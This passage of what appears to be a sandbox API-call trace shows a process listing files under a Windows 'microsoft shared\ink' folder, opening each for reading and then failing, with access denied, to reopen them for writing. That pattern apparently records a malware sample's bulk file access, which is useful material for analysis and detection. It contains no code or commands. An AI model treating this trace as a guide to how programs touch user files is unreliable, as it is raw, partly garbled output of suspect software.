lpNewFilePointer=0x0) returned 1 [0082.911] CloseHandle (hObject=0x42c) returned 1 [0082.912] AreFileApisANSI () returned 1 [0082.912] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0082.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x84fe0 [0082.912] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x84fe0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\tipresx.dll.mui") returned 73 [0082.912] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fi-fi\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.912] GetLastError () returned 0x5 [0082.912] GetLastError () returned 0x5 [0082.912] SetLastError (dwErrCode=0x5) [0082.912] GetLastError () returned 0x5 [0082.912] SetLastError (dwErrCode=0x5) [0082.912] GetLastError () returned 0x5 [0082.912] SetLastError (dwErrCode=0x5) [0082.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fe0 | out: hHeap=0x20000) returned 1 [0082.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0082.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0082.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0082.912] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.912] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.912] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x2e438, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓⠀")) returned 0 [0082.912] FindClose (in: hFindFile=0x77fd0 | out: hFindFile=0x77fd0) returned 1 [0082.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0082.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0082.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0082.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0082.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0082.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0082.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0082.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46048 | out: hHeap=0x20000) returned 1 [0082.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0082.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0082.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0082.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0082.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0082.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0082.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0082.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60088 [0082.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0082.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0082.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a238 [0082.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0082.913] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.913] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.913] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.913] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a238 | out: hHeap=0x20000) returned 1 [0082.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0082.913] AreFileApisANSI () returned 1 [0082.913] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi", lpUsedDefaultChar=0x0) returned 70 [0082.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0082.913] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.913] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0082.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0082.914] AreFileApisANSI () returned 1 [0082.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 70 [0082.914] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8c) returned 0x8b110 [0082.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x8b110, cchWideChar=70 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi") returned 70 [0082.914] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0082.916] GetFileType (hFile=0x430) returned 0x1 [0082.916] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b110 | out: hHeap=0x20000) returned 1 [0082.916] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0082.916] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0082.916] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0082.916] CloseHandle (hObject=0x430) returned 1 [0082.917] AreFileApisANSI () returned 1 [0082.917] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 70 [0082.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8c) returned 0x8a368 [0082.917] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x8a368, cchWideChar=70 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi") returned 70 [0082.917] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.917] GetLastError () returned 0x5 [0082.917] GetLastError () returned 0x5 [0082.917] SetLastError (dwErrCode=0x5) [0082.917] GetLastError () returned 0x5 [0082.917] SetLastError (dwErrCode=0x5) [0082.917] GetLastError () returned 0x5 [0082.917] SetLastError (dwErrCode=0x5) [0082.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0082.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0082.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0082.917] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.917] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.917] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c8f49e8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd121ea9a, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd121ea9a, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0xc4800, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="FlickLearningWizard.exe", cAlternateFileName="")) returned 1 [0082.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0082.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0082.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0082.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0082.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0082.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0082.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0082.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0082.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0082.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0082.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0082.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0082.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0082.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0082.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0082.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0082.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0082.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f848 [0082.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0082.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0082.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0082.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f848 | out: hHeap=0x20000) returned 1 [0082.918] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.918] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.918] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.918] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0082.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0082.918] AreFileApisANSI () returned 1 [0082.918] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickLearningWizard.exe", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickLearningWizard.exe", lpUsedDefaultChar=0x0) returned 75 [0082.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d2c0 [0082.918] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.918] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0082.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0082.919] AreFileApisANSI () returned 1 [0082.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0082.919] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x85b20 [0082.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x85b20, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickLearningWizard.exe") returned 75 [0082.919] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickLearningWizard.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flicklearningwizard.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0082.920] GetFileType (hFile=0x430) returned 0x1 [0082.920] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85b20 | out: hHeap=0x20000) returned 1 [0082.920] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0082.920] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0082.920] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0082.920] CloseHandle (hObject=0x430) returned 1 [0082.920] AreFileApisANSI () returned 1 [0082.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0082.920] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x856c0 [0082.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x856c0, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickLearningWizard.exe") returned 75 [0082.921] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickLearningWizard.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flicklearningwizard.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.921] GetLastError () returned 0x5 [0082.921] GetLastError () returned 0x5 [0082.921] SetLastError (dwErrCode=0x5) [0082.921] GetLastError () returned 0x5 [0082.921] SetLastError (dwErrCode=0x5) [0082.921] GetLastError () returned 0x5 [0082.921] SetLastError (dwErrCode=0x5) [0082.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x856c0 | out: hHeap=0x20000) returned 1 [0082.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0082.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0082.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d2c0 | out: hHeap=0x20000) returned 1 [0082.921] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.921] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.921] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0635c03, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="fr-CA", cAlternateFileName="")) returned 1 [0082.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0082.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0082.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0082.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0082.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0082.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0082.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0082.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0082.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0082.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0082.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0082.921] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.921] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.921] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.921] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0082.922] AreFileApisANSI () returned 1 [0082.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA", lpUsedDefaultChar=0x0) returned 57 [0082.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0082.922] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.922] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0082.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0082.922] AreFileApisANSI () returned 1 [0082.922] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0082.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69bb0 [0082.922] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA") returned 57 [0082.922] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-ca"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.922] GetLastError () returned 0x5 [0082.922] GetLastError () returned 0x5 [0082.922] SetLastError (dwErrCode=0x5) [0082.922] GetLastError () returned 0x5 [0082.922] SetLastError (dwErrCode=0x5) [0082.922] GetLastError () returned 0x5 [0082.922] SetLastError (dwErrCode=0x5) [0082.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0082.922] AreFileApisANSI () returned 1 [0082.922] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0082.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69db0 [0082.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA") returned 57 [0082.923] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-ca"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.923] GetLastError () returned 0x5 [0082.923] GetLastError () returned 0x5 [0082.923] SetLastError (dwErrCode=0x5) [0082.923] GetLastError () returned 0x5 [0082.923] SetLastError (dwErrCode=0x5) [0082.923] GetLastError () returned 0x5 [0082.923] SetLastError (dwErrCode=0x5) [0082.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, 